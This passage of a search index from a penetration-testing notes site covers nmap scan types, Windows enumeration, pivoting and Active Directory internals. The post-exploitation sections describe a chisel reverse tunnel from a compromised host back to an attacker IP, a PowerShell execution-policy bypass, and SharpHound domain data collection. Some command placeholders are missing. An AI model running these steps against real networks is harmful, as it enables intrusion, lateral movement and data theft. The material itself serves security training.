Open Ports","id":"206","title":"List Open Ports"},"207":{"body":"Plenty of automated tools can be found for enumerating Windows machines. They are a bit more diverse than those available for Linux - there are precompiled binaries (.exes) available, but there are also PowerShell scripts and many more.","breadcrumbs":"Post Exploitation » Enumeration » Windows » Introduction","id":"207","title":"Introduction"},"208":{"body":"WinPEAS is an incredible tool for enumerating Windows machines. It comes in two flavours - .bat and .exe. It doesn't really matter which one you are going to run - both will do the job just fine - however, the .exe file requires .Net version 4.5.2 or later to be installed on the machine. Enumerating system information: winpeas.exe systeminfo","breadcrumbs":"Post Exploitation » Enumeration » Windows » Windows Enumeration with WinPEAS","id":"208","title":"Windows Enumeration with WinPEAS"},"209":{"body":"systeminfo","breadcrumbs":"Post Exploitation » Enumeration » Windows » System Enumeration » Enumerate System Information","id":"209","title":"Enumerate System Information"},"21":{"body":"This is the default scan for nmap when it does not have elevated privileges. It initiates a full TCP connection and as a result can be slower. Additionally, it is also logged at the application level. 
This type of scan can also be specified via the -sT option.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » TCP Connect Scan » TCP Connect Scan","id":"21","title":"TCP Connect Scan"},"210":{"body":"wmic qfe","breadcrumbs":"Post Exploitation » Enumeration » Windows » System Enumeration » Enumerate Patches","id":"210","title":"Enumerate Patches"},"211":{"body":"wmic logicaldisk get caption,description,providername","breadcrumbs":"Post Exploitation » Enumeration » Windows » System Enumeration » Enumerate Drives","id":"211","title":"Enumerate Drives"},"212":{"body":"Pivoting is the act of establishing access to internal resources on a network through a compromised machine. This allows an adversary to exfiltrate local data which is usually not accessible from the outside world. Moreover, it permits the use of hacking tools as if they were running from inside the network.","breadcrumbs":"Post Exploitation » Pivoting » Introduction","id":"212","title":"Introduction"},"213":{"body":"Chisel is an open-source application for port tunneling. You can get it from https://github.com/jpillora/chisel. Clone the repo and follow the installation instructions. In order to port tunnel with chisel, you need to have a copy of the binary on both the attacking and the compromised machines.","breadcrumbs":"Post Exploitation » Pivoting » Tunneling with Chisel » Introduction","id":"213","title":"Introduction"},"214":{"body":"Run the following command on the attacking machine: chisel server -p [Listen Port] --reverse & This will set up a chisel server on Listen Port. On the compromised system run: chisel client [Attacker IP]:[Listen Port] R:[Local Host]:[Local Port]:[Remote Host]:[Remote Port] & This will endeavour to connect to a chisel server at the specified Attacker IP and Listen Port. Once it has connected to the remote chisel server, the chisel server will open Remote Port on the Remote Host and tunnel it to the Local Port of Local Host. 
From now on, any traffic sent to Remote Port on the Remote Host will be forwarded to the Local Port of Local Host. Chisel also defines some defaults for these values, which means you can omit some of them: Local Host - 0.0.0.0 Remote Host - 0.0.0.0 (server localhost) As an example, suppose you start a chisel server on your attacking machine (10.10.10.189) on port 1337, and want to gain access to port 3306 on the compromised machine. On the attacking machine you run: chisel server -p 1337 --reverse & On the compromised system you will run: chisel client 10.10.10.189:1337 R:localhost:3306:localhost:31337 & The above basically translates to \"Forward any traffic intended for port 31337 localhost on my attacking machine to port 3306 on the localhost of the compromised system\".","breadcrumbs":"Post Exploitation » Pivoting » Tunneling with Chisel » Creating a reverse tunnel","id":"214","title":"Creating a reverse tunnel"},"215":{"body":"SSH Tunneling is a port forwarding technique which uses SSH. It can be used to access internal resources within a network if you have SSH access to a host inside it. Additionally, the tunnel goes through a pre-existing SSH connection and can thus be utilised for bypassing firewalls.","breadcrumbs":"Post Exploitation » Pivoting » SSH Tunneling » Introduction","id":"215","title":"Introduction"},"216":{"body":"Local port forwarding is used when you want to create a bridge to a port that hosts an internal service which does not accept connections from outside the network. For this to work, you need to specify two ports - one for the service on the remote machine which you want to access and one on your local machine to create the listener on. Any packets sent to your machine on the local port will be tunneled to the port on the remote machine through the SSH connection. Whilst you will still receive any responses to requests you send through the tunnel, you won't be able to receive arbitrary data that gets sent to the remote port. 
The syntax is fairly simple: ssh -L [LOCAL_IP:]LOCAL_PORT:DESTINATION:DESTINATION_PORT SSH_SERVER [LOCAL_IP:] - the interface you want to open the listener on. This can be omitted and defaults to localhost. LOCAL_PORT - the port you want to start the listener on. Any traffic sent to this port will be forwarded through the tunnel. DESTINATION - the destination host. This does not need to (and most likely won't) match SSH_SERVER, since you are now trying to access an internal resource. DESTINATION_PORT - the port on the remote machine, that you want to access through the tunnel. You can also add -N -f to the above command, so that ssh runs in the background and only opens the tunnel without giving an interface for typing commands. We have now established a tunnel on my Kali machine's port 8080, which will forward any traffic to 192.168.129.137:1337, which is my ubuntu server. So let's see if we can access the web page. Wait, what? We just created the tunnel, but it does not seem to work? Well, remember how the DESTINATION does not need to match the server's IP? This is because the DESTINATION is where the traffic is sent after it gets to the remote machine. In a sense, the remote machine is now the sender and not us. Therefore, in order to access a resource internal to the network, we would need to change DESTINATION to something like localhost or another computer's IP. Let's again check to see if we have access to the resource hidden behind localhost:1337 on the Ubuntu server...","breadcrumbs":"Post Exploitation » Pivoting » SSH Tunneling » Local Port Forwarding","id":"216","title":"Local Port Forwarding"},"217":{"body":"Remote port forwarding is sort of the reverse of local port forwarding. A tunnel is opened and any traffic sent to the tunnel port on the remote machine will be forwarded to the local machine. In the exact same way as above, once the traffic is tunneled, the local machine becomes the sender. 
Therefore, remote port forwarding is more useful when you want to receive traffic from inside the network, rather than injecting it. You will be able to actively receive any data that is sent to the remote port, but you won't be able to send arbitrary data through the tunnel yourself. The syntax is also very similar: ssh -R [REMOTE:]REMOTE_PORT:DESTINATION:DESTINATION_PORT SSH_SERVER [REMOTE:] - the remote host to listen on. This resembles the LOCAL_IP when local port forwarding and can be omitted. If left empty, the remote machine will bind on all interfaces REMOTE_PORT - the port on the remote machine that is part of the tunnel. DESTINATION:DESTINATION_PORT - the host and port that the traffic should be sent to once it gets from the remote machine back to the local machine Once again, you can add -N -f to the command, so that ssh runs in the background and only opens the tunnel without giving an interface for typing commands.","breadcrumbs":"Post Exploitation » Pivoting » SSH Tunneling » Remote Port Forwarding","id":"217","title":"Remote Port Forwarding"},"218":{"body":"","breadcrumbs":"Post Exploitation » Active Directory (AD) » Active Directory (AD)","id":"218","title":"Active Directory (AD)"},"219":{"body":"PowerView is a PowerShell tool for the enumeration of Windows domains. The script can be downloaded from https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1. Before running, you need to bypass PowerShell's execution policy: powershell -ep bypass Load the script using . .\\PowerView.ps1 Normally, you'd be running these commands through some sort of shell, but for the sake of simplicity, I will show them all run locally.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Overview","id":"219","title":"Overview"},"22":{"body":"These scan types make use of a small loophole in the TCP RFC to differentiate between open and closed ports. 
RFC 793 dictates that \"if the destination port state is CLOSED .... an incoming segment not containing a RST causes a RST to be sent in response.” It also says the following about packets sent to open ports without the SYN, RST, or ACK bits set: “you are unlikely to get here, but if you do, drop the segment, and return\". Scanning systems compliant with this RFC text, any packet not containing SYN, RST, or ACK bits will beget an RST if the port is closed and no response at all if the port is open. So long as none of these flags are set, any combination of the other three (FIN, PSH, and URG) is fine. These scan types can sneak through certain non-stateful firewalls and packet filtering routers and are a little more stealthy than even a SYN scan. However, not all systems are compliant with RFC 793 - some send a RST even if the port is open. Some operating systems that do this include Microsoft Windows, a lot of Cisco devices, IBM OS/400, and BSDI. These scans will work against most Unix-based systems. 
It is not possible to distinguish an open from a filtered port with these scans, which is why the port states will be open|filtered.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » Overview","id":"22","title":"Overview"},"220":{"body":"Get-NetDomain","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Domain Information","id":"220","title":"Get Domain Information"},"221":{"body":"Get-NetDomainController","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Domain Controller Information","id":"221","title":"Get Domain Controller Information"},"222":{"body":"Get-DomainPolicy You can also get information about a specific policy with the following syntax: (Get-DomainPolicy).\"policy name\"","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Retrieve Domain Policy Information","id":"222","title":"Retrieve Domain Policy Information"},"223":{"body":"Get-NetUser The output of this command is rather messy, but you can pull specific information with the following syntax: Get-NetUser | select However, there is an even better way to do that.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Users Information","id":"223","title":"Get Users Information"},"224":{"body":"Get specific properties of all the users: Get-DomainUser -Properties ,,... 
It is useful to always have the samaccountname as the first property selected, so that you can easily match properties with specific users.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get User Property Information","id":"224","title":"Get User Property Information"},"225":{"body":"Get-DomainComputer | select samaccountname, operatingsystem","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Domain Machines","id":"225","title":"Get Domain Machines"},"226":{"body":"Get-NetGroup | select samaccountname, admincount, description","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Groups","id":"226","title":"Get Groups"},"227":{"body":"Get-NetGPO | select ,,...","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Group Policy Information","id":"227","title":"Get Group Policy Information"},"228":{"body":"https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters/powerview","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Additional Resources","id":"228","title":"Additional Resources"},"229":{"body":"Bloodhound is a tool used for finding relationships and patterns within data from an Active Directory environment. It is run on the attacker's machine and accessed through a web interface. Bloodhound operates on data and this data comes from a collector which is executed on the target machine.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Overview","id":"229","title":"Overview"},"23":{"body":"Doesn't set any flags. Since null scanning does not set any flags, it can sometimes penetrate firewalls and edge routers that filter incoming packets with certain flags. 
It is invoked with the -sN option:","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » Null Scan","id":"23","title":"Null Scan"},"230":{"body":"Install Bloodhound sudo apt install bloodhound Configure neo4j - Bloodhound relies on a different tool called neo4j. It is best to change its default credentials. run neo4j sudo neo4j console open the link it gives you and use the credentials neo4j:neo4j to login change the password","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Setup","id":"230","title":"Setup"},"231":{"body":"Data is obtained through a collector. There are different ones available. You can get SharpHound from the Bloodhound GitHub repo - https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1. Start neo4j and bloodhound: sudo neo4j console sudo bloodhound Run the collector on the target machine: powershell -ep bypass . .\\SharpHound.ps1 Invoke-BloodHound -CollectionMethod All -Domain -ZipFileName Now, move the files to the attacker machine.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Collecting Data for Bloodhound","id":"231","title":"Collecting Data for Bloodhound"},"232":{"body":"In Bloodhound, on the right you should see a button for Upload Data. Select the previously obtained zip file and wait for Bloodhound to process it. In the top left, click on the three dashes and you should see a summary of the data imported:","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Viewing the Data","id":"232","title":"Viewing the Data"},"233":{"body":"Through the analysis tab, you can see a bunch of pre-made queries. Their names are usually self-describing. 
Clicking on any of them will generate a particular graph expressing a specific relationship within the AD environment: You are also able to create custom queries.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Finding Relationships in the Data","id":"233","title":"Finding Relationships in the Data"},"234":{"body":"","breadcrumbs":"System Internals","id":"234","title":"System Internals"},"235":{"body":"","breadcrumbs":"System Internals » Linux","id":"235","title":"System Internals"},"236":{"body":"","breadcrumbs":"System Internals » Linux » Processes » User ID","id":"236","title":"User ID"},"237":{"body":"Linux uses a unified file system which begins at the / directory (pronounced \"root\", notwithstanding this unfortunate naming). Directory Description / The anchor of the file system. Pronounced \"root\". /root The home directory of the root user. /home The home directories of non-root users are stored here. /usr All system files are stored here - the U nix S ystem R esource. /etc Stores configuration files. /var Stores variable data files such as logs, caches, etc. /opt Any additional software which is not built-in should be installed here. /tmp Temporary data storage. Its contents are erased at every boot or at a certain period. /proc Runtime process information.","breadcrumbs":"System Internals » Linux » File System » Unified File System","id":"237","title":"Unified File System"},"238":{"body":"A symbolic, or soft , link is a reference in the file system to a particular file. When the symbolic link is used in a command, the file which it references will be used instead. Symbolic links between files (or directories for that matter) can be created by using the following command: ln -s It is important to note that when using relative paths for the link, the path is relative to the link (even after it is moved) and not the current working directory. 
Essentially, when creating a link with a relative path, the link points to ./file. However, if the link is moved, then ./ will refer to a different directory and the link won't be able to find what it is referencing.","breadcrumbs":"System Internals » Linux » File System » Symbolic Links","id":"238","title":"Symbolic Links"},"239":{"body":"Hard links are different from the symbolic links in the sense that they do not have any relationship to the original path where they link to, but only to its contents. They are just files which reference the same data as another file. Hard links are created by using the following syntax: ln Because hard links bear no connection to the path they were created with, they will still point to the same data even after they are relocated.","breadcrumbs":"System Internals » Linux » File System » Hard Links","id":"239","title":"Hard Links"},"24":{"body":"Sets just the FIN bit to on. It is invoked with -sF:","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » FIN Scan","id":"24","title":"FIN Scan"},"240":{"body":"Every file and directory in Linux is owned by a certain user and a group and is assigned three sets of permissions - owner, group, and all users. The owner permissions describe what the user owning the file can do with it, the group permissions describe what members of the group owning the file can do with it, and the all users permissions describe what the rest of the non-root (root is allowed everything) users which are not members of the file's group can do with it. There are 3 possible types of permissions - read (r), write (w) and execute (x). Regarding the file shown here, the permissions are shown on the left and are represented by every 3 characters after the initial dash (-). So, here the file's owner (cr0mll) has rwx permissions on it. 
Every member of the sysint group will have rw permissions on the file and all other users will only be able to read it.","breadcrumbs":"System Internals » Linux » File System » Permissions","id":"240","title":"Permissions"},"241":{"body":"The Set Owner User ID (SUID) is a special permission which can be set on executable files. When a file with SUID set is executed, it will always run with the effective UID of the user who owns it, irrespective of which user actually passed the command (so long as the user invoking the command also has execute permissions on the file). The SUID permission is indicated by replacing the x in the permissions of the owning user with s. Setting SUID on a file can be done with the following command: chmod u+s Note The SUID permission on scripts is ignored.","breadcrumbs":"System Internals » Linux » File System » Set Owner User ID (SUID)","id":"241","title":"Set Owner User ID (SUID)"},"242":{"body":"Similarly to SUID, the Set Group ID (SGID) is a special permission which can be set on both executable files and directories. When set on files, it behaves in the same way as SUID, but rather than the files executing with the privileges of the owning user, they execute with the effective GID of the owning group. When set on a directory, any file created within that directory will automatically have its group ownership set to the one specified by the folder. Setting SGID on a file can be done with the following command: chmod g+s Note The SGID permission on scripts is ignored.","breadcrumbs":"System Internals » Linux » File System » Set Group ID (SGID)","id":"242","title":"Set Group ID (SGID)"},"243":{"body":"The sticky bit is a special permission which can be applied to directories in order to limit file deletion within them to the owners of the files. 
It is denoted by a t in the place of the x permission for the directory and can be set with the following command: chmod +t ","breadcrumbs":"System Internals » Linux » File System » Sticky Bit","id":"243","title":"Sticky Bit"},"244":{"body":"The command line is a text-based interface which allows for interaction with the computer and execution of commands. The actual command interpreter which carries out the commands is referred to as the shell and there are multiple examples of shells such as bash, zsh, sh, etc.","breadcrumbs":"System Internals » Linux » Command Line » Introduction","id":"244","title":"Introduction"},"245":{"body":"It is possible to redirect input and output from and to files when invoking commands: Redirection Description < in_file Redirect in_file into the command's standard input. > out_file Redirect the command's standard output into out_file by overwriting it. >> out_file Redirect the command's standard output into out_file by appending to it. 2> err_file Redirect the command's standard error into err_file by overwriting it. 2>> err_file Redirect the command's standard error into err_file by appending to it.","breadcrumbs":"System Internals » Linux » Command Line » Input and Output Redirection","id":"245","title":"Input and Output Redirection"},"246":{"body":"Moreover, information may be redirected directly from one command to another by using unnamed pipes (|).","breadcrumbs":"System Internals » Linux » Command Line » Pipes","id":"246","title":"Pipes"},"247":{"body":"","breadcrumbs":"System Internals » Windows","id":"247","title":"System Internals"},"248":{"body":"Active Directory (AD) is a directory service for Windows network environments. It allows an organisation to store directory data and make it available to the users in a given network. 
AD has a distributed hierarchical structure that allows for the management of an organisation's resources such as users, computers, groups, network devices, file shares, group policies, servers, workstations and trusts. Furthermore, it provides authentication and authorization functionality to Windows domain environments. Essentially, AD is a large database of information which is accessible to all users within a domain, irrespective of their privilege level. This means that a standard user account can be used to enumerate a large portion of all AD components.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Introduction","id":"248","title":"Introduction"},"249":{"body":"Resources in Active Directory are represented by objects. An object is any resource present within Active Directory such as OUs, printers, users, domain controllers, etc. Every object has a set of characteristic attributes which describe it. For example, a computer object has attributes such as hostname and DNS name. Additionally, all AD attributes are associated with an LDAP name which can be used when performing LDAP queries. Every object carries information in these attributes, some of which are mandatory and some optional. Objects can be instantiated with a predefined set of attributes from a class in order to make the process of object creation easier. For example, the computer object PC1 will be an instance of the computer class in Active Directory. It is common for objects to contain other objects, in which case they are called containers . An object holding no other objects is known as a leaf .","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Objects","id":"249","title":"Objects"},"25":{"body":"Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree. 
It is performed through the -sX option:","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » Xmas Scan","id":"25","title":"Xmas Scan"},"250":{"body":"Objects are organised in logical groups called domains . These can further have nested subdomains in them and can either operate independently or be linked to other domains via trust relationships. A root domain together with all of its subdomains and nested objects is known as a tree . A collection of trees is referred to as a forest (really???). It is the root container for all objects in a given AD environment. Following is an example forest with a single tree: COMPANY.LOCAL/\n├─ ADMIN.COMPANY.LOCAL\n│ ├─ GPOs\n│ ├─ OUs\n│ │ ├─ EMPLOYEES\n│ │ │ ├─ COMPUTERS\n│ │ │ │ ├─ PC1\n│ │ │ ├─ USERS\n│ │ │ │ ├─ jdoe\n│ │ │ ├─ GROUPS\n│ │ │ │ ├─ STAFF\n├─ DEV.COMPANY.LOCAL\n├─ MAIL.COMPANY.LOCAL","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Object Organisation","id":"250","title":"Object Organisation"},"251":{"body":"The full path to an object in AD is specified via a Distinguished Name (DN) . A Relative Distinguished Name (RDN) is a single component of the DN that separates the object from other objects at the current level in the naming hierarchy. RDNs are represented as attribute-value pairs in the form attribute=value, typically expressed in UTF-8. A DN is simply a comma-separated list of RDNs which begins with the top-most hierarchical layer and becomes more specific as you go to the right. For example, the DN for the John Doe user would be dc=local,dc=company,dc=admin,ou=employees,ou=users,cn=jdoe. 
The following attribute types are defined for RDNs (LDAP name - attribute):\nDC - domainComponent\nCN - commonName\nOU - organizationalUnitName\nO - organizationName\nSTREET - streetAddress\nL - localityName\nST - stateOrProvinceName\nC - countryName\nUID - userid\nIt is also important to note that the following characters are special and need to be escaped with a \\ if they appear in an attribute value:\n- a space or # at the beginning of the value\n- a space at the end of the value\n- , (comma)\n- + (plus sign)\n- \" (double quote)\n- \\ (backslash)\n- / (forward slash)\n- < and > (angle brackets)\n- ; (semicolon)\n- LF (line feed) and CR (carriage return)\n- = (equals sign)","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Distinguished Name (DN) & Relative Distinguished Name (RDN)","id":"251","title":"Distinguished Name (DN) & Relative Distinguished Name (RDN)"},"252":{"body":"Trusts in Active Directory link two domains or two forests. They allow users in one domain to access resources in another domain where their account does not reside. They work by linking the authentication systems of the two domains. The two parties in a trust do not necessarily have the same capabilities with respect to each other: One-way trusts allow only one party to access the resources of the other. The trusted domain is the one whose users access the resources and the trusting domain is the one providing them. Two-way trusts allow the parties to mutually access each other's resources. Additionally, trusts can either be transitive or non-transitive. Transitivity means that the trust extends to the other domains which the trusted domain itself trusts. For example, a transitive two-way trust is established between a new domain and its parent domain upon creation. Any children of the new domain (grandchildren of the parent domain) will therefore also share a trust relationship with the parent. 
Five types of trust can be distinguished depending on the relationship between the domains being linked:\nParent-child - A two-way transitive trust between a parent domain and a child domain, created automatically when the child domain is added.\nCross-link (shortcut) - A trust between two domains in the same forest, used to shorten the authentication path between them.\nExternal - A non-transitive trust between two domains in separate forests which are not already linked by a forest trust.\nTree-root - A two-way transitive trust between the forest root domain and the root domain of a new tree in the forest.\nForest - A transitive trust between two forest root domains in separate forests.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Trusts","id":"252","title":"Trusts"},"253":{"body":"A contact in AD contains information about an external person or company that may need to be contacted on a regular basis. Contact objects are instances of the Contact class and are considered leaf objects. Their attributes include first name, last name, email address, telephone number, etc. Contacts are not security principals - they lack a SID and only have a GUID.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Contacts » Introduction","id":"253","title":"Introduction"},"254":{"body":"Security Principal - any object which can be authenticated by the operating system, such as a user or computer account, a thread/process running in the security context of a user or computer account, or a security group of such accounts. Security Identifier (SID) - a unique identifier for a security principal or group. Every security principal has its own unique SID, which is issued by the domain controller and stored in the directory database.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Terminology","id":"254","title":"System Internals"},"255":{"body":"A user in AD stores information about an employee or contractor who works for the organisation. 
These objects are instances of the User class. User objects are leaf objects, since they do not contain any other objects. Every user is considered a security principal and has its own SID and GUID. Additionally, user objects can have numerous different attributes such as display name, email address, last login time, etc. - well in excess of 800.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Users » Introduction","id":"255","title":"Introduction"},"256":{"body":"Domain Users in AD are the accounts capable of accessing resources in the Active Directory environment. By default, these users can log on interactively to any domain-joined workstation or member server, but not to domain controllers. All domain users have five essential naming attributes as well as many others:\nUserPrincipalName (UPN) - The primary logon name for the user, which by convention uses the user's email address.\nObjectGUID - A unique identifier for the user which never changes, even after removal of the user.\nSAMAccountName - A logon name providing support for previous versions of Windows.\nobjectSID - The user's security identifier (SID), which uniquely identifies the user; the SIDs of the user's groups are added to the access token at logon.\nsIDHistory - A history of the user's previous SIDs, used when the user is migrated from one domain to another.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Users » Domain Users","id":"256","title":"Domain Users"},"257":{"body":"Groups are instances of the AD Group class. They provide the means to mass assign permissions to users, making administration a lot easier. The administrator assigns a set of privileges to the group and they will be inherited by any user who joins it. Groups have two essential characteristics - type and scope.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Introduction","id":"257","title":"Introduction"},"258":{"body":"The group type identifies the group's purpose and must be chosen upon creation of the group. There are two types of groups. 
Security groups are best suited precisely for the purpose described above - mass assignment of permissions to users. Distribution groups are a bit different - they cannot be used to assign permissions (they cannot appear in ACLs) and are really only used by email applications for the distribution of messages to their members. They resemble mailing lists and can be auto-filled in the recipient field when sending emails using Microsoft Outlook.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Group Type","id":"258","title":"Group Type"},"259":{"body":"There are three possible group scopes and, once again, the scope must be selected upon creation of the group. The group scope determines where the group can be granted permissions and which accounts it may contain. Domain Local groups can only be used to manage permissions on resources within the domain that the group belongs to. Whilst such groups cannot be used in other domains, they can contain users from other domains. Additionally, nesting of domain local groups is allowed within other domain local groups but not within global ones. Global groups can be granted access to resources in any domain of the forest, although they may only contain accounts from their own domain. Nesting of global groups is allowed both in other global groups and in domain local groups. Universal groups allow permissions management across all domains within the same forest. Their membership is stored in the Global Catalog, so any change to it is replicated to every Global Catalog server in the forest. To avoid unnecessary replication, administrators are advised to keep users and computers in global groups, which are themselves nested in universal groups. It is also possible to change the scope of a group under certain conditions: A global group can be promoted to a universal group if it is not a member of another global group. A domain local group can be promoted to a universal group if it does not contain any other domain local groups. 
A universal group can be demoted to a global group if it does not contain any other universal groups. A universal group can be freely demoted to a domain local group.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Group Scope","id":"259","title":"Group Scope"},"26":{"body":"Web servers usually run on port 80 or 443 depending on whether they serve HTTP or HTTPS. Version information about the underlying web server application can be obtained via nmap using the -sV option. nmap -p80,443 -sV We can also use the http-enum NSE script which will perform some basic web server enumeration for us: nmap -p80 --script=http-enum Note Web servers are also commonly set up on custom ports, but one can enumerate those in the same way.","breadcrumbs":"Reconnaissance » Enumeration » Web Server Enumeration (80, 443) » Obtaining Version Information","id":"26","title":"Obtaining Version Information"},"260":{"body":"Some built-in groups are automatically created when an AD environment is set up. These groups have specific purposes, and their membership is one of the first things worth enumerating, since several of them are equivalent to domain administration:\nAccount Operators - Management of most account types with the exception of the Administrator account, administrative user accounts, or members of the Administrators, Server Operators, Account Operators, Backup Operators, or Print Operators groups. Additionally, members can log in locally to domain controllers.\nAdministrators - Full access to a computer or to the entire domain, if the membership is on a domain controller.\nBackup Operators - Ability to back up or restore all files on a computer, irrespective of the permissions set on them; ability to log on to and shut down the computer; ability to log on to domain controllers locally; ability to make shadow copies of the SAM/NTDS databases.\nDnsAdmins - Access to DNS network information. Only created if the DNS server role is installed at some point on a domain controller. 
Domain Admins - Full permissions to administer the domain; members are local administrators on every domain-joined machine.\nDomain Computers - Contains all computers which are not domain controllers.\nDomain Controllers - Contains all domain controllers in the domain.\nDomain Guests - Includes the built-in Guest account.\nDomain Users - Contains all users in the domain.\nEnterprise Admins - Complete configuration access within the forest; ability to make forest-wide changes such as creating child domains and trusts; only exists in the forest root domain.\nEvent Log Readers - Ability to read event logs on local computers.\nGroup Policy Creator Owners - Management of GPOs in the domain.\nHyper-V Administrators - Complete access to all Hyper-V features.\nIIS_IUSRS - Used by IIS.\nPre–Windows 2000 Compatible Access - Provides backwards-compatibility with Windows NT 4.0 or earlier.\nPrint Operators - Printer management; ability to log on to DCs and load printer drivers.\nProtected Users - Provides additional protection against credential theft by disabling NTLM, DES and RC4 Kerberos encryption, delegation and credential caching for its members.\nRead-Only Domain Controllers - Contains all read-only DCs in the domain.\nRemote Desktop Users - Ability to connect to a host via RDP.\nRemote Management Users - Ability to access WMI resources over management protocols such as WinRM.\nSchema Admins - Ability to modify the AD schema.\nServer Operators - Ability to modify services, SMB shares and backup files on domain controllers.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Default Groups","id":"260","title":"Default Groups"},"261":{"body":"Domain Controllers (DCs) are at the heart of Active Directory. There are Flexible Single Master Operation (FSMO) roles which can be assigned separately to domain controllers in order to avoid conflicts when data is updated in the AD environment. These roles are the following:\nSchema Master - Management of the AD schema.\nDomain Naming Master - Management of domain names; ensures that no two domains in the same forest share the same name. 
Relative ID (RID) Master - Allocation of RID pools to the other DCs in the domain, which ensures that no two objects share the same SID.\nPDC Emulator - The authoritative DC in the domain: it receives replicated password changes first, is consulted on failed authentications, is the preferred DC for editing Group Policy Objects (GPOs) and acts as the time source for the domain.\nInfrastructure Master - Maintains cross-domain object references (GUIDs, SIDs and DNs) for objects that live in other domains of the forest.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Domain Controllers » Introduction","id":"261","title":"Introduction"},"262":{"body":"A computer object is an instance of the Computer class in Active Directory and represents a workstation or server joined to the domain. Computer objects are security principals and therefore have both a SID and a GUID. These are prime targets for adversaries: full administrative access to a computer (NT AUTHORITY\\SYSTEM) lets one act as the computer account, which has privileges similar to those of a standard domain user and can therefore be used to enumerate the AD environment.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Computers » Introduction","id":"262","title":"Introduction"},"263":{"body":"Windows uses the New Technology File System (NTFS) for managing its files and folders. What makes it special is its ability to automatically repair files and folders on disk using its journal in case of a failure. Additionally, it lifts certain limitations which were characteristic of its predecessors by supporting files larger than 4GB, allowing permissions to be set on specific files and folders and offering both compression and encryption. Another peculiar feature of NTFS is Alternate Data Streams.","breadcrumbs":"System Internals » Windows » File System » Introduction","id":"263","title":"Introduction"},"264":{"body":"NTFS allows every user/group to have its own set of permissions on every file and folder in the file system tree. 
The following six types of permission can be set (effect on files / effect on folders):\nRead - View or access the file's contents / View and list files and subfolders.\nWrite - Write to the file / Add files or subfolders.\nRead & Execute - View or access the file's contents as well as execute the file / View and list files and subfolders as well as execute files. Inherited by both files and folders.\nList Folder Contents - N/A / View and list files and subfolders as well as execute files. Inherited only by folders.\nModify - Read and write to the file, or delete it / Read and write to files and subfolders, or delete the folder.\nFull Control - Read, write, change or delete the file, change its permissions and take ownership / The same for files and subfolders.","breadcrumbs":"System Internals » Windows » File System » Permissions","id":"264","title":"Permissions"},"265":{"body":"Permissions can be inspected from the command line by running icacls on the file or folder. The last set of parentheses for each user/group tells you the permissions: F - Full Control, M - Modify, RX - Read & Execute, R - Read, W - Write. Additionally, the permissions on a file/folder can be inspected by right-clicking on the item in Windows Explorer, following Properties->Security and then selecting the user/group you want to see the permissions for.","breadcrumbs":"System Internals » Windows » File System » Inspecting Permissions","id":"265","title":"Inspecting Permissions"},"266":{"body":"A not very well-known, yet interesting feature of NTFS is the so-called Alternate Data Streams. These were implemented for better Macintosh file support (resource forks), but they can lead to security vulnerabilities and offer ways to hide data. A data stream can be thought of as a file within another file. Each stream has its own allocated disk space, size and file locks. Moreover, alternate data streams are invisible in Windows Explorer, which makes them an easy way to hide data within legitimate-looking files. Every file in NTFS has at least one default data stream where its data is stored. 
